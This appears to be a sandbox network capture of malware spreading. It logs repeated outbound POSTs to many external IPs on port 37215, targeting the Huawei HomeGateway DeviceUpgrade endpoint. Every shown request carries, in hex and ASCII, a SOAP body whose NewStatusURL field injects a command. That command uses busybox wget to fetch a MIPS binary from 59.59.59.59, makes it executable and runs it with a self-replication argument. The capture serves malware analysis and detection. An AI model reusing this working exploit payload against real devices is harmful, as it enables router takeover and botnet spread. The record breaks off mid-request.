                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          177192.168.2.1537312157.63.75.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.544002056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          178192.168.2.155507441.117.178.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.545031071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          179192.168.2.1552732197.85.110.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.548218012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          180192.168.2.154129241.10.228.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.548602104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          181192.168.2.1542562197.101.122.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.549283028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          182192.168.2.1542476184.22.80.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.549979925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          183192.168.2.1549494157.163.151.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.549979925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          184192.168.2.1546042197.187.154.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.550643921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          185192.168.2.1540214197.167.106.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.550663948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          186192.168.2.156040241.92.173.15937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.550797939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
